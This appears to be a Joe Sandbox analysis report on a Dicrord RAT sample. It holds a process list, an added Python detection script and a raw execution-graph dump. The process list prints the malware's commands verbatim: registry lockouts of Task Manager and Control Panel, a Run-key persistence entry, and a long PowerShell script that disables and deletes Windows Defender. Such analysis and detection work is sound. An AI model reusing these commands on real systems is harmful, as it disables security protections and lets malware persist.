                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\bang.bat" "
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:2
                                      Start time:18:14:49
                                      Start date:15/02/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:3
                                      Start time:18:14:49
                                      Start date:15/02/2024
                                      Path:C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe
                                      Wow64 process (32bit):false
                                      Commandline:bang_executor.exe
                                      Imagebase:0x230771e0000
                                      File size:351'232 bytes
                                      MD5 hash:E1EAD094E52097B884389A8064B15E2B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_DicrordRat, Description: Yara detected Dicrord Rat, Source: 00000003.00000000.1613544617.00000230771E2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_DicrordRat, Description: Yara detected Dicrord Rat, Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe, Author: Joe Security
                                      Antivirus matches:
                                      • Detection: 100%, Joe Sandbox ML
                                      Reputation:low
                                      Has exited:true

                                      Target ID:4
                                      Start time:18:14:50
                                      Start date:15/02/2024
                                      Path:C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exe
                                      Wow64 process (32bit):false
                                      Commandline:executer.exe
                                      Imagebase:0x990000
                                      File size:280'576 bytes
                                      MD5 hash:88E22186F196CC0E1E2D500EEAC57337
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 48%, ReversingLabs
                                      Reputation:low
                                      Has exited:true

                                      Target ID:5
                                      Start time:18:14:50
                                      Start date:15/02/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\system32\cmd.exe /K instaling.bat
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      Target ID:6
                                      Start time:18:14:50
                                      Start date:15/02/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:7
                                      Start time:18:14:50
                                      Start date:15/02/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\system32\cmd.exe /K mgr.bat
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      Target ID:8
                                      Start time:18:14:50
                                      Start date:15/02/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      Target ID:9
                                      Start time:18:14:50
                                      Start date:15/02/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      Target ID:10
                                      Start time:18:14:50
                                      Start date:15/02/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\system32\cmd.exe /K microsoft.bat
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      Target ID:11
                                      Start time:18:14:50
                                      Start date:15/02/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      Target ID:12
                                      Start time:18:14:50
                                      Start date:15/02/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
                                      Imagebase:0xee0000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:13
                                      Start time:18:14:50
                                      Start date:15/02/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                      Imagebase:0xee0000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:14
                                      Start time:18:14:50
                                      Start date:15/02/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v bang_executor /t REG_SZ /d "C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe" /f
                                      Imagebase:0xee0000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:15
                                      Start time:18:14:51
                                      Start date:15/02/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\system32\cmd.exe" /C echo Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SpyNetReporting -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SubmitSamplesConsent -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name TamperProtection -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender\"; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender Advanced Threat Protection\"; Remove-Item -Recurse -Force -Path "C:\Windows\System32\drivers\wd\"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" > test.ps1
                                      Imagebase:0x7ff6e6d80000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:16
                                      Start time:18:14:51
                                      Start date:15/02/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v NoDispAppearancePage /t REG_DWORD /d 1 /f
                                      Imagebase:0xee0000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:17
                                      Start time:18:14:51
                                      Start date:15/02/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:18
                                      Start time:18:14:51
                                      Start date:15/02/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\system32\cmd.exe" /C powershell.exe -ep bypass .\test.ps1;
                                      Imagebase:0x7ff6e6d80000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:19
                                      Start time:18:14:51
                                      Start date:15/02/2024
                                      Path:C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe"
                                      Imagebase:0x23b86100000
                                      File size:351'232 bytes
                                      MD5 hash:E1EAD094E52097B884389A8064B15E2B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:20
                                      Start time:18:14:51
                                      Start date:15/02/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:21
                                      Start time:18:14:51
                                      Start date:15/02/2024
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
                                      Commandline:powershell.exe -ep bypass .\test.ps1;
                                      Imagebase:0x7ff788560000
                                      File size:452'608 bytes
                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:25
                                      Start time:18:14:52
                                      Start date:15/02/2024
                                      Path:C:\Windows\System32\WerFault.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\WerFault.exe -u -p 1236 -s 2324
                                      Imagebase:0x7ff768760000
                                      File size:570'736 bytes
                                      MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:26
                                      Start time:18:14:52
                                      Start date:15/02/2024
                                      Path:C:\Windows\System32\WerFault.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\WerFault.exe -u -p 7572 -s 2328
                                      Imagebase:0x7ff768760000
                                      File size:570'736 bytes
                                      MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:27
                                      Start time:18:14:54
                                      Start date:15/02/2024
                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                      Imagebase:0x7ff693ab0000
                                      File size:496'640 bytes
                                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                      Has elevated privileges:true
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:28
                                      Start time:18:14:59
                                      Start date:15/02/2024
                                      Path:C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe"
                                      Imagebase:0x1350ba50000
                                      File size:351'232 bytes
                                      MD5 hash:E1EAD094E52097B884389A8064B15E2B
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:30
                                      Start time:18:15:00
                                      Start date:15/02/2024
                                      Path:C:\Windows\System32\WerFault.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\WerFault.exe -u -p 7356 -s 2296
                                      Imagebase:0x7ff768760000
                                      File size:570'736 bytes
                                      MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:32
                                      Start time:18:15:07
                                      Start date:15/02/2024
                                      Path:C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe"
                                      Imagebase:0x21d60c70000
                                      File size:351'232 bytes
                                      MD5 hash:E1EAD094E52097B884389A8064B15E2B
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:34
                                      Start time:18:15:08
                                      Start date:15/02/2024
                                      Path:C:\Windows\System32\WerFault.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\WerFault.exe -u -p 7968 -s 2324
                                      Imagebase:0x7ff768760000
                                      File size:570'736 bytes
                                      MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:36
                                      Start time:18:15:18
                                      Start date:15/02/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true
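
The process list above shows the whole chain: reg.exe locks out Control Panel and Task Manager (Targets 12, 13), writes a Run-key value that points into the RarSFX0 temp folder (Target 14), cmd.exe echoes a Defender-neutering script into test.ps1 (Target 15), and powershell.exe runs it with the execution policy bypassed (Targets 18, 21). The following Python triage is an added example, not Joe Sandbox code and not the Sigma rules the report names: the regular expressions are the author's own approximations of those rule ideas, the first six sample lines are copied from the command lines above (Target 15 shortened to four of the cmdlets it echoes), and the two benign lines at the end are constructed for contrast.

```python
"""Flag defence-evasion and persistence techniques in process command lines.

Added example; the patterns below are approximations written for this page,
not Joe Sandbox's or Sigma's detection logic.
"""
import re
from typing import Dict, List, Set

# Rule name -> pattern. Case-insensitive and whitespace-tolerant so trivial
# reformatting by the attacker does not evade them.
RULES: Dict[str, re.Pattern] = {
    # Windows Defender weakened via MpPreference, its service keys, or policy
    "defender_tamper": re.compile(
        r'Set-MpPreference\s+-Disable\w+'
        r'|Add-MpPreference\s+-Exclusion(?:Path|Process|Extension)'
        r'|ThreatDefaultAction\s+Allow'
        r'|Services\\(?:WinDefend|WdNisSvc|Sense|WdnisDrv|wdfilter|wdboot)"?\s+-Name\s+Start\s+-Value\s+4'
        r'|Remove-Item\b.*?Services\\(?:WinDefend|WdNisSvc|Sense|WdnisDrv|wdfilter|wdboot)\b'
        r'|DisableAntiSpyware\b.*?-Value\s+1'
        r'|TamperProtection\b',
        re.I,
    ),
    # HKCU\...\Policies\System\DisableTaskMgr = 1
    "taskmgr_disabled": re.compile(r'\bDisableTaskMgr\b.*?/d\s+1\b', re.I),
    # HKCU\...\Policies\Explorer\NoControlPanel = 1
    "control_panel_disabled": re.compile(r'\bNoControlPanel\b.*?/d\s+1\b', re.I),
    # Any Run-key value written with reg.exe
    "run_key_persistence": re.compile(
        r'\breg(?:\.exe)?\s+add\s+"?HK(?:CU|LM|EY_CURRENT_USER|EY_LOCAL_MACHINE)\\'
        r'Software\\Microsoft\\Windows\\CurrentVersion\\Run\b',
        re.I,
    ),
    # powershell launched with -ExecutionPolicy (or an abbreviation) Bypass
    "execution_policy_bypass": re.compile(
        r'\bpowershell(?:\.exe)?\b.*?\s-(?:ep|ex\w*)\s+bypass\b', re.I
    ),
}

# Autorun targets under user-writable scratch directories; this is the idea
# behind "New RUN Key Pointing to Suspicious Folder".
SUSPICIOUS_AUTORUN_DIRS = re.compile(
    r'/d\s+"?[A-Z]:\\Users\\[^\\"]+\\AppData\\Local\\Temp\\'
    r'|/d\s+"?[A-Z]:\\Users\\Public\\',
    re.I,
)


def match_rules(cmdline: str) -> Set[str]:
    """Return the names of every rule that fires on one command line."""
    hits = {name for name, pat in RULES.items() if pat.search(cmdline)}
    if "run_key_persistence" in hits and SUSPICIOUS_AUTORUN_DIRS.search(cmdline):
        hits.add("autorun_in_suspicious_folder")
    return hits


def defender_cmdlets(cmdline: str) -> List[str]:
    """List the Set-MpPreference -Disable* switches a command line sets."""
    return re.findall(r'Set-MpPreference\s+-(Disable\w+)', cmdline, re.I)


def triage(cmdlines: List[str]) -> Dict[str, List[int]]:
    """Map each fired rule to the indexes of the command lines that fired it."""
    report: Dict[str, List[int]] = {}
    for idx, line in enumerate(cmdlines):
        for name in sorted(match_rules(line)):
            report.setdefault(name, []).append(idx)
    return report


SAMPLE_CMDLINES = [
    # 0-5: copied from the process list (Targets 12, 13, 14, 15, 18, 21)
    r'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f',
    r'reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f',
    r'reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v bang_executor /t REG_SZ /d "C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe" /f',
    # Target 15, shortened to four of the cmdlets it echoes into test.ps1
    r'"C:\Windows\system32\cmd.exe" /C echo Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 > test.ps1',
    r'"C:\Windows\system32\cmd.exe" /C powershell.exe -ep bypass .\test.ps1;',
    r'powershell.exe -ep bypass .\test.ps1;',
    # 6-7: constructed benign lines for contrast (not from the report)
    r'C:\Windows\system32\conhost.exe 0xffffffff -ForceV1',
    r'reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"',
]

if __name__ == "__main__":
    for rule, idxs in triage(SAMPLE_CMDLINES).items():
        print(f"{rule}: lines {idxs}")
    print("Defender switches:", defender_cmdlets(SAMPLE_CMDLINES[3]))
```

Run against the eight sample lines, the triage fires control_panel_disabled on line 0, taskmgr_disabled on line 1, run_key_persistence plus autorun_in_suspicious_folder on line 2, defender_tamper on line 3 and execution_policy_bypass on lines 4 and 5, and stays silent on the conhost and reg query lines. Against live telemetry the same functions would take the CommandLine field of Sysmon event 1 or Security event 4688; the echo-to-file step in Target 15 is worth keeping as its own signal, since the Defender cmdlets never appear on the powershell.exe command line itself, only in the script file it is told to run.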


                                        Execution Graph

                                        Execution Coverage:9.6%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:13.4%
                                        Total number of Nodes:1721
                                        Total number of Limit Nodes:48
25338 500aca 25336->25338 25353 500b41 25337->25353 25338->25312 25340 500aa9 25341 500ac5 25340->25341 25356 500c6a 25340->25356 25361 500acb GetModuleHandleW GetProcAddress GetProcAddress 25341->25361 25344 500d13 25344->25312 25346 500cea 25345->25346 25347 500d0c 25345->25347 25348 500b41 DloadReleaseSectionWriteAccess 3 API calls 25346->25348 25347->25331 25349 500cef 25348->25349 25350 500d07 25349->25350 25351 500c6a DloadProtectSection 3 API calls 25349->25351 25364 500d0e GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 25350->25364 25351->25350 25362 500acb GetModuleHandleW GetProcAddress GetProcAddress 25353->25362 25355 500b46 25355->25340 25357 500c7f DloadProtectSection 25356->25357 25358 500cba VirtualProtect 25357->25358 25359 500c85 25357->25359 25363 500b80 VirtualQuery GetSystemInfo 25357->25363 25358->25359 25359->25341 25361->25344 25362->25355 25363->25358 25364->25347 26691 508870 QueryPerformanceFrequency QueryPerformanceCounter 25376 50067c 14 API calls ___delayLoadHelper2@8 26763 513665 21 API calls 2 library calls 26696 4e1075 44 API calls 26764 502610 RaiseException std::_Xinvalid_argument _com_error::_com_error 26698 4fc000 28 API calls 26700 4e1025 29 API calls 26701 4e4c20 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 26769 4e2620 97 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26770 50ca20 21 API calls 2 library calls 26706 4fd8c0 98 API calls 26776 4f82d0 138 API calls __InternalCxxFrameHandler 26708 50ccf0 31 API calls 2 library calls 26777 50caf0 71 API calls _free 26778 512ef0 IsProcessorFeaturePresent 26709 501cf3 20 API calls 26710 4e24e0 26 API calls std::bad_exception::bad_exception 25378 4fdae0 25379 4fdaf2 25378->25379 25554 4e1366 25379->25554 25382 4fdb5c 25385 4fdb76 25382->25385 25388 4fdb6d 25382->25388 25389 4fdbd0 25382->25389 25383 4fe250 25656 4ff9ee 25383->25656 25384 5010f9 
__ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25387 4fe555 25384->25387 25385->25384 25392 4fdbad 25388->25392 25393 4fdb71 25388->25393 25391 4fdc63 GetDlgItemTextW 25389->25391 25399 4fdbe6 25389->25399 25391->25392 25396 4fdca0 25391->25396 25392->25385 25401 4fdc94 EndDialog 25392->25401 25393->25385 25405 4f0597 53 API calls 25393->25405 25394 4fe26b SendMessageW 25395 4fe279 25394->25395 25397 4fe293 GetDlgItem SendMessageW 25395->25397 25398 4fe282 SendDlgItemMessageW 25395->25398 25402 4fdca9 25396->25402 25403 4fdcb5 GetDlgItem 25396->25403 25675 4fc5dd GetCurrentDirectoryW 25397->25675 25398->25397 25404 4f0597 53 API calls 25399->25404 25401->25385 25402->25392 25416 4fe196 25402->25416 25407 4fdcec SetFocus 25403->25407 25408 4fdcc9 SendMessageW SendMessageW 25403->25408 25409 4fdc03 SetDlgItemTextW 25404->25409 25410 4fdb90 25405->25410 25406 4fe2c3 GetDlgItem 25411 4fe2e6 SetWindowTextW 25406->25411 25412 4fe2e0 25406->25412 25413 4fdcfc 25407->25413 25427 4fdd08 25407->25427 25408->25407 25414 4fdc0e 25409->25414 25699 4e1273 6 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25410->25699 25676 4fcb49 GetClassNameW 25411->25676 25412->25411 25418 4f0597 53 API calls 25413->25418 25414->25385 25421 4fdc1b GetMessageW 25414->25421 25419 4f0597 53 API calls 25416->25419 25422 4fdd06 25418->25422 25424 4fe1a6 SetDlgItemTextW 25419->25424 25421->25385 25426 4fdc32 IsDialogMessageW 25421->25426 25564 4ff7fc 25422->25564 25423 4fe531 SetDlgItemTextW 25423->25385 25429 4fe1ba 25424->25429 25426->25414 25431 4fdc41 TranslateMessage DispatchMessageW 25426->25431 25432 4f0597 53 API calls 25427->25432 25436 4f0597 53 API calls 25429->25436 25431->25414 25434 4fdd3f 25432->25434 25438 4e4c00 _swprintf 51 API calls 25434->25438 25435 4fdd77 25440 4fdd96 25435->25440 25445 4ebccb 8 API calls 25435->25445 25469 4fe1dd _wcslen 25436->25469 25437 4fe331 25442 4fe361 25437->25442 25443 4f0597 53 API calls 25437->25443 25438->25422 
25588 4ebaf1 25440->25588 25441 4fea07 122 API calls 25441->25437 25448 4fea07 122 API calls 25442->25448 25487 4fe419 25442->25487 25446 4fe344 SetDlgItemTextW 25443->25446 25450 4fdd8c 25445->25450 25451 4f0597 53 API calls 25446->25451 25454 4fe37c 25448->25454 25449 4fe4c0 25455 4fe4c9 EnableWindow 25449->25455 25456 4fe4d2 25449->25456 25450->25440 25576 4fcebf 25450->25576 25458 4fe358 SetDlgItemTextW 25451->25458 25452 4fddaf GetLastError 25453 4fddba 25452->25453 25599 4fcbb6 SetCurrentDirectoryW 25453->25599 25466 4fe38e 25454->25466 25486 4fe3b3 25454->25486 25455->25456 25461 4fe4ef 25456->25461 25709 4e1323 GetDlgItem KiUserCallbackDispatcher 25456->25709 25457 4fe22e 25460 4f0597 53 API calls 25457->25460 25458->25442 25460->25385 25464 4fe516 25461->25464 25476 4fe50e SendMessageW 25461->25476 25464->25385 25477 4f0597 53 API calls 25464->25477 25465 4fddce 25471 4fdde5 25465->25471 25472 4fddd7 GetLastError 25465->25472 25707 4fbe55 31 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25466->25707 25467 4fe40c 25470 4fea07 122 API calls 25467->25470 25468 4fe4e5 25710 4e1323 GetDlgItem KiUserCallbackDispatcher 25468->25710 25469->25457 25475 4f0597 53 API calls 25469->25475 25470->25487 25479 4fde5c 25471->25479 25481 4fddf5 GetTickCount 25471->25481 25482 4fde6b 25471->25482 25472->25471 25483 4fe211 25475->25483 25476->25464 25480 4fdb97 25477->25480 25478 4fe3a7 25478->25486 25479->25482 25485 4fe097 25479->25485 25480->25385 25480->25423 25494 4e4c00 _swprintf 51 API calls 25481->25494 